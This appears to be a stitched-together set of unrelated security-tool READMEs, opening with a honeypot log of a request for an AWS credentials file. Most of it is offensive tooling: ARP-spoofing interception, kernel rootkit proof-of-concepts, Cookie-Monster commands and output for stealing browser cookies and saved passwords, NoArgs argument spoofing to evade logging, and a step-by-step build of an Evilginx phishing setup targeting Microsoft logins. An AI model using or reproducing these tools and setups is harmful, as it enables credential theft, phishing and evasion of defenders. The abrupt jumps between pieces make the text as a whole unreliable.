{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}
Okay, that was impressive!
Now, let's do some sort of adversarial testing!
% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.
JSON log record:
{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}
% curl http://localhost:8888/i-mean-are-you-a-fake-server
No, I am not a fake server.
JSON log record:
{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}
You're a galah, mate!
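Since every interaction is logged as one JSON object per line, a capture file can be triaged in a few lines of Python; a minimal sketch (the log file name here is assumed):

```python
import json

# Hypothetical log file name; one JSON record per line, as shown above.
with open("sensor.json") as fh:
    for line in fh:
        rec = json.loads(line)
        req = rec["httpRequest"]
        print(rec["timestamp"], rec["srcIP"], req["method"], req["request"],
              "->", rec["httpResponse"]["headers"].get("Server", "-"))
```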
CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.
| Detection | Description |
|---|---|
Direct Syscall | Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks. |
NTDLL Unhooking | Identifies attempts to unhook functions within the NTDLL library, a common evasion technique. |
AMSI Patch | Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis. |
ETW Patch | Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection. |
PE Stomping | Identifies instances of PE (Portable Executable) stomping. |
Reflective PE Loading | Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis. |
Unbacked Thread Origin | Identifies threads originating from unbacked memory regions, often indicative of malicious activity. |
Unbacked Thread Start Address | Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection. |
API hooking | Places a hook on the NtWriteVirtualMemory function to monitor memory modifications. |
Custom Pattern Search | Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures. |
To get started with CrimsonEDR, follow these steps:
```bash
sudo apt-get install gcc-mingw-w64-x86-64
```

```bash
git clone https://github.com/Helixo32/CrimsonEDR
```

```bash
cd CrimsonEDR; chmod +x compile.sh; ./compile.sh
```
Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.
To use CrimsonEDR, follow these steps:
Make sure that the `ioc.json` file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from `C:\Users\admin\`, the DLL will look for `ioc.json` in `C:\Users\admin\ioc.json`. Currently, `ioc.json` contains patterns related to `msfvenom`. You can easily add your own in the following format:
{
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
]
}
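Each pattern entry is just a byte sequence rendered as hex strings, so entries can be generated from raw shellcode; a minimal sketch (this helper is hypothetical, not part of CrimsonEDR):

```python
import json

def ioc_from_shellcode(buf: bytes, chunk: int = 8) -> dict:
    """Slice shellcode into fixed-size windows and render them as hex strings."""
    rows = [buf[i:i + chunk] for i in range(0, len(buf) - chunk + 1, chunk)]
    return {"IOC": [[f"0x{b:02x}" for b in row] for row in rows]}

# Example: the last pattern from the ioc.json above.
shellcode = bytes.fromhex("e8cc000000415141")
print(json.dumps(ioc_from_shellcode(shellcode), indent=2))
```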
Execute `CrimsonEDRPanel.exe` with the following arguments:

- `-d <path_to_dll>`: Specifies the path to the `CrimsonEDR.dll` file.
- `-p <process_id>`: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

For example:

.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234
Here are some useful resources that helped in the development of this project:
For questions, feedback, or support, please reach out to me via:
```bash
git clone https://github.com/your_username/status-checker.git
cd status-checker
```

```bash
pip install -r requirements.txt
```
python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
- `-d`, `--domain`: Single domain/URL to check.
- `-l`, `--list`: File containing a list of domains/URLs to check.
- `-o`, `--output`: File to save the output.
- `-v`, `--version`: Display version information.
- `-update`: Update the tool.

Example:
python status_checker.py -l urls.txt -o results.txt
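For context, the core of such a checker is one HTTP request per target; a minimal, independent sketch of the idea (assuming the requests library, not the tool's own code):

```python
import requests

def check(url: str) -> str:
    """Return the HTTP status for a URL, prefixing a scheme if missing."""
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    try:
        r = requests.get(url, timeout=5, allow_redirects=True)
        return f"{url} -> {r.status_code}"
    except requests.RequestException as exc:
        return f"{url} -> DOWN ({exc.__class__.__name__})"

with open("urls.txt") as fh:
    for line in fh:
        if line.strip():
            print(check(line.strip()))
```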
This project is licensed under the MIT License - see the LICENSE file for details.
The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational materials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.
Clone the repository
git clone https://github.com/csalab-id/csaf.git
Navigate to the project directory
cd csaf
Pull the Docker images
docker-compose --profile=all pull
Generate the Wazuh SSL certificates
docker-compose -f generate-indexer-certs.yml run --rm generator
For security reasons, you should first set the following environment variables:
export ATTACK_PASS=ChangeMePlease
export DEFENSE_PASS=ChangeMePlease
export MONITOR_PASS=ChangeMePlease
export SPLUNK_PASS=ChangeMePlease
export GOPHISH_PASS=ChangeMePlease
export MAIL_PASS=ChangeMePlease
export PURPLEOPS_PASS=ChangeMePlease
Start all the containers
docker-compose --profile=all up -d
You can run specific labs by selecting one of the following profiles: `all`, `attackdefenselab`, `phisinglab`, `breachlab`, `soclab`.
For example
docker-compose --profile=attackdefenselab up -d
Exposed ports can be accessed using a SOCKS5 proxy client, an SSH client, or an HTTP client. Choose one for the best experience.
This Docker Compose application is released under the MIT License. See the LICENSE file for details.
Espionage is a network packet sniffer that intercepts large amounts of data being passed through an interface. The tool allows users to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc. Espionage can also spoof ARP so that all data sent by the target gets redirected through the attacker (MiTM). Espionage supports IPv4, TCP/UDP, ICMP, and HTTP. Espionage was written in Python 3.8 but it also supports version 3.6. This is the first version of the tool, so please contact the developer if you want to help contribute and add more to Espionage. Note: This is not a Scapy wrapper; scapylib only assists with HTTP requests and ARP.
1: git clone https://www.github.com/josh0xA/Espionage.git
2: cd Espionage
3: sudo python3 -m pip install -r requirments.txt
4: sudo python3 espionage.py --help
sudo python3 espionage.py --normal --iface wlan0 -f capture_output.pcap

Replace `wlan0` with whatever your network interface is.

sudo python3 espionage.py --verbose --iface wlan0 -f capture_output.pcap
sudo python3 espionage.py --normal --iface wlan0
sudo python3 espionage.py --verbose --httpraw --iface wlan0
sudo python3 espionage.py --target <target-ip-address> --iface wlan0
sudo python3 espionage.py --iface wlan0 --onlyhttp
sudo python3 espionage.py --iface wlan0 --onlyhttpsecure
sudo python3 espionage.py --iface wlan0 --urlonly
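For intuition, the heart of any such sniffer is a per-packet callback on a chosen interface; a minimal, independent sketch with scapy (not Espionage's own code, which the author notes is not a Scapy wrapper):

```python
# Requires root privileges; replace wlan0 with your interface.
from scapy.all import IP, TCP, UDP, sniff

def show(pkt):
    """Print direction and protocol for each captured IP packet."""
    if IP in pkt:
        proto = "TCP" if TCP in pkt else "UDP" if UDP in pkt else str(pkt[IP].proto)
        print(f"{pkt[IP].src} -> {pkt[IP].dst} [{proto}] len={len(pkt)}")

sniff(iface="wlan0", prn=show, store=False)
```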
usage: espionage.py [-h] [--version] [-n] [-v] [-url] [-o] [-ohs] [-hr] [-f FILENAME] -i IFACE
[-t TARGET]
optional arguments:
-h, --help show this help message and exit
--version returns the packet sniffers version.
-n, --normal executes a cleaner interception, less sophisticated.
-v, --verbose (recommended) executes a more in-depth packet interception/sniff.
-url, --urlonly only sniffs visited urls using http/https.
-o, --onlyhttp sniffs only tcp/http data, returns urls visited.
-ohs, --onlyhttpsecure
sniffs only https data, (port 443).
-hr, --httpraw displays raw packet data (byte order) received or sent on port 80.
(Recommended) arguments for data output (.pcap):
-f FILENAME, --filename FILENAME
name of file to store the output (make extension '.pcap').
(Required) arguments required for execution:
-i IFACE, --iface IFACE
specify network interface (ie. wlan0, eth0, wlan1, etc.)
(ARP Spoofing) required arguments in-order to use the ARP Spoofing utility:
-t TARGET, --target TARGET
A simple medium writeup can be found here:
Click Here For The Official Medium Article
The developer of this program, Josh Schiavone, wrote the following code for educational and ethical purposes only. The data sniffed/intercepted is not to be used for malicious intent. Josh Schiavone is not responsible or liable for misuse of this penetration testing tool. May God bless you all.
MIT License
Copyright (c) 2024 Josh Schiavone
Information gathering for web application security.
sudo apt install python3 python3-pip
pip3 install termcolor
pip3 install google
pip3 install optioncomplete
pip3 install bs4
pip3 install prettytable
git clone https://github.com/Matrix07ksa/HackerInfo/
cd HackerInfo
chmod +x HackerInfo
./HackerInfo -h
python3 HackerInfo.py -d www.facebook.com -f pdf
[+] <-- Running Domain_filter_File ....-->
[+] <-- Searching [www.facebook.com] Files [pdf] ....-->
https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_japanese_jp.pdf
#####################[Finshid]########################
sudo python setup.py install
pip3 install hackinfo
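For reference, the file discovery shown above boils down to a search-engine dork; a rough, independent sketch using the googlesearch module pulled in by `pip3 install google` above (its `search()` signature varies between releases):

```python
from googlesearch import search  # provided by the `google` package

domain, filetype = "www.facebook.com", "pdf"
query = f"site:{domain} filetype:{filetype}"
# stop/pause keywords exist in the classic `google` package; adjust for your version.
for url in search(query, stop=20, pause=2.0):
    print(url)
```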
Free-to-use IOC feed for various tools/malware. It started out covering just C2 tools but has morphed into tracking infostealers and botnets as well. It uses Shodan searches to collect the IPs. The most recent collection is always stored in `data`; the IPs are broken down by tool, and there is an `all.txt`.

The feed should update daily. Actively working on making the backend more reliable.
Many of the Shodan queries have been sourced from other CTI researchers:
Huge shoutout to them!
Thanks to BertJanCyber for creating the KQL query for ingesting this feed
And finally, thanks to Y_nexro for creating C2Live in order to visualize the data
If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY
echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
```bash
python3 -m pip install -r requirements.txt
python3 tracker.py
```
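With the key exported, collecting IPs for a query takes only a few lines with the official shodan library; a minimal sketch (the query string is illustrative, not one of the feed's actual queries):

```python
import os

import shodan

api = shodan.Shodan(os.environ["SHODAN_API_KEY"])
results = api.search('product:"example c2 server"')  # illustrative query only
ips = sorted({match["ip_str"] for match in results["matches"]})
print("\n".join(ips))
```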
I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted, just know, fidelity is paramount (high true/false positive ratio is the focus).
PoCs for kernelmode rootkit techniques, for research or education. Currently focusing on Windows OS. All modules support 64-bit OSes only.
NOTE
Some modules use the `ExAllocatePool2` API to allocate kernel pool memory. `ExAllocatePool2` is not supported in OSes older than Windows 10 Version 2004. If you want to test the modules in older OSes, replace the `ExAllocatePool2` API with the `ExAllocatePoolWithTag` API.
All modules are tested on Windows 11 x64. To test the drivers, the following options can be used for the testing machine:
Setting Up Kernel-Mode Debugging (WinDbg, CDB, or NTSD)
Each option requires Secure Boot to be disabled.
Detailed information is given in the README.md in each project's directory.
| Module Name | Description |
|---|---|
BlockImageLoad | PoCs to block driver loading with the Load Image Notify Callback method. |
BlockNewProc | PoCs to block new processes with the Process Notify Callback method. |
CreateToken | PoCs to get a fully privileged SYSTEM token with the ZwCreateToken() API. |
DropProcAccess | PoCs to drop process handle access with the Object Notify Callback. |
GetFullPrivs | PoCs to get full privileges with the DKOM method. |
GetProcHandle | PoCs to get a full-access process handle from kernelmode. |
InjectLibrary | PoCs to perform DLL injection with the Kernel APC Injection method. |
ModHide | PoCs to hide loaded kernel drivers with the DKOM method. |
ProcHide | PoCs to hide processes with the DKOM method. |
ProcProtect | PoCs to manipulate Protected Processes. |
QueryModule | PoCs to retrieve loaded kernel driver address information. |
StealToken | PoCs to perform token stealing from kernelmode. |
More PoCs, especially about the following topics, will be added later:
Pavel Yosifovich, Windows Kernel Programming, 2nd Edition (Independently published, 2023)
Bruce Dang, Alexandre Gazet, Elias Bachaalany, and Sébastien Josse, Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation (Wiley Publishing, 2014)
Bill Blunden, The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System, 2nd Edition (Jones & Bartlett Learning, 2012)
Steal browser cookies for Edge, Chrome, and Firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s), and then filelessly download the target files. Once the Cookies/Login Data file(s) are downloaded, the Python decryption script can help extract those secrets! The Firefox module will parse profiles.ini, locate the logins.json and key4.db files, and download them. A separate GitHub repo is referenced for offline decryption.
Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>]
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-monster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if the chrome process with a handle to the Cookies file is already known, specify its PID to duplicate the handle and retrieve the file
--chromeLoginDataPID, if the chrome process with a handle to the Login Data file is already known, specify its PID to duplicate the handle and retrieve the file
--edgeCookiePID, if the edge process with a handle to the Cookies file is already known, specify its PID to duplicate the handle and retrieve the file
--edgeLoginDataPID, if the edge process with a handle to the Login Data file is already known, specify its PID to duplicate the handle and retrieve the file
Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file
Install requirements
pip3 install -r requirements.txt
Base64 encode the webkit masterkey
python3 base64-encode.py "\xec\xfc...."
Decrypt Chrome/Edge Cookies File
python .\decrypt.py "XHh..." --cookies ChromeCookie.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Decrypt Chrome/Edge Passwords File
python .\decrypt.py "XHh..." --passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
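For reference, the decryption both commands perform is standard AES-256-GCM under the extracted WebKit master key; a minimal sketch of the scheme (assuming pycryptodome; this is independent of the bundled decrypt.py):

```python
import sqlite3

from Crypto.Cipher import AES  # pycryptodome

# Replace with the real 32-byte master key extracted by cookie-monster.
MASTER_KEY = bytes.fromhex("00" * 32)

def decrypt_value(blob: bytes) -> str:
    # Chromium "v10" blobs: 3-byte version prefix, 12-byte nonce,
    # ciphertext, then a 16-byte GCM authentication tag.
    nonce, ciphertext, tag = blob[3:15], blob[15:-16], blob[-16:]
    cipher = AES.new(MASTER_KEY, AES.MODE_GCM, nonce=nonce)
    return cipher.decrypt_and_verify(ciphertext, tag).decode()

con = sqlite3.connect("ChromeCookie.db")
for host, name, enc in con.execute(
        "SELECT host_key, name, encrypted_value FROM cookies"):
    print(host, name, decrypt_value(enc))
```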
Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd
Ensure Mingw-w64 and make are installed on Linux prior to compiling, then run `make`.

To compile the exe on Windows:
gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI
NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.
The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW
. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.
Hooking into CreateProcessW
is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW
, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned.
The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.
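To make the PEB's role concrete, the sketch below reads a target process's command line from the same structures the tool modifies (Windows x64 only, via ctypes; offsets 0x20 and 0x70/0x78 are the usual x64 layouts; this is an independent illustration, not NoArgs code):

```python
import ctypes
import sys

ntdll = ctypes.WinDLL("ntdll")
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.OpenProcess.restype = ctypes.c_void_p

class PROCESS_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [("Reserved1", ctypes.c_void_p),
                ("PebBaseAddress", ctypes.c_void_p),
                ("Reserved2", ctypes.c_void_p * 2),
                ("UniqueProcessId", ctypes.c_void_p),
                ("Reserved3", ctypes.c_void_p)]

def read_mem(handle, addr, size):
    """Read `size` bytes from the target process at `addr`."""
    buf = ctypes.create_string_buffer(size)
    kernel32.ReadProcessMemory(ctypes.c_void_p(handle), ctypes.c_void_p(addr),
                               buf, size, None)
    return buf.raw

def command_line_of(pid):
    PROCESS_VM_READ, PROCESS_QUERY_INFORMATION = 0x10, 0x400
    h = kernel32.OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, False, pid)
    pbi = PROCESS_BASIC_INFORMATION()
    ntdll.NtQueryInformationProcess(ctypes.c_void_p(h), 0, ctypes.byref(pbi),
                                    ctypes.sizeof(pbi), None)
    # PEB->ProcessParameters sits at offset 0x20 on x64.
    params = int.from_bytes(read_mem(h, pbi.PebBaseAddress + 0x20, 8), "little")
    # RTL_USER_PROCESS_PARAMETERS->CommandLine is a UNICODE_STRING at +0x70:
    # Length at +0x70, Buffer pointer at +0x78.
    length = int.from_bytes(read_mem(h, params + 0x70, 2), "little")
    buffer = int.from_bytes(read_mem(h, params + 0x78, 8), "little")
    return read_mem(h, buffer, length).decode("utf-16-le")

if __name__ == "__main__":
    print(command_line_of(int(sys.argv[1])))
```

A spoofing tool overwrites the same `CommandLine` buffer this sketch merely reads, which is why tooling that trusts the PEB shows the faked arguments.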
Process Hacker View:
Process Monitor View:
Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for The Obfuscated Executable in the releases page)
Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW
function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.
Custom Process Creation Function: Upon intercepting a CreateProcessW
call, the custom function is executed, creating the new process and manipulating its arguments as necessary.
PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments.
Execution Redirection: Upon completion of the manipulations, execution seamlessly returns to Command Prompt (cmd) without any interruption. This dynamic redirection ensures that subsequent commands entered are manipulated discreetly, evading detection and logging mechanisms that rely on reading process details from the PEB.
Option 1: Compile NoArgs DLL:
You will need Microsoft Detours installed.
Compile the DLL.
Option 2: Download the compiled executable (ready-to-go) from the releases page.
A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.
This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.
Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. ▶ Watch Video
☕ Buy Me A Coffee
This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.
Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.
That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.
The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.
In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.
A Browser In The Browser (BITB) without any iframes! As simple as that.
Meaning that we can now use BITB with Evilginx on websites like Microsoft.
Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.
Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.
Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)
Update and Upgrade system packages:
sudo apt update && sudo apt upgrade -y
Create a new evilginx user, and add user to sudo group:
sudo su
adduser evilginx
usermod -aG sudo evilginx
Test that evilginx user is in sudo group:
su - evilginx
sudo ls -la /root
Navigate to users home dir:
cd /home/evilginx
(You can do everything as sudo user as well since we're running everything locally)
Download and build Evilginx: Official Docs
Copy Evilginx files to /home/evilginx
Install Go: Official Docs
wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile
ADD: export PATH=$PATH:/usr/local/go/bin
source ~/.profile
Check:
go version
Install make:
sudo apt install make
Build Evilginx:
cd /home/evilginx/evilginx2
make
Create a new directory for our evilginx build along with phishlets and redirectors:
mkdir /home/evilginx/evilginx
Copy build, phishlets, and redirectors:
cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx
cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors
cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets
Ubuntu firewall quick fix (thanks to @kgretzky)
sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx
On Ubuntu, if you get a `Failed to start nameserver on: :53` error, try modifying this file:

sudo nano /etc/systemd/resolved.conf

Edit/add the `DNSStubListener` setting and set it to `no`:

> DNSStubListener=no
then
sudo systemctl restart systemd-resolved
Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.
nano ~/.evilginx/config.json
CHANGE https_port
from 443
to 8443
Install Apache2:
sudo apt install apache2 -y
Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)
sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat
Start and enable Apache:
sudo systemctl start apache2
sudo systemctl enable apache2
Check that Apache and the VM's networking work by visiting the VM's IP from a browser on the host machine.
Install git if not already available:
sudo apt -y install git
Clone this repo:
git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb
Make directories for the pages we will be serving:
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary
Copy the directories for each page:
sudo cp -r ./pages/home/ /var/www/
sudo cp -r ./pages/primary/ /var/www/
sudo cp -r ./pages/secondary/ /var/www/
Optional: Remove the default Apache page (not used):
sudo rm -r /var/www/html/
Copy the O365 phishlet to phishlets directory:
sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml
Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js
and change the CALENDLY_PAGE_NAME
and CALENDLY_EVENT_TYPE
.
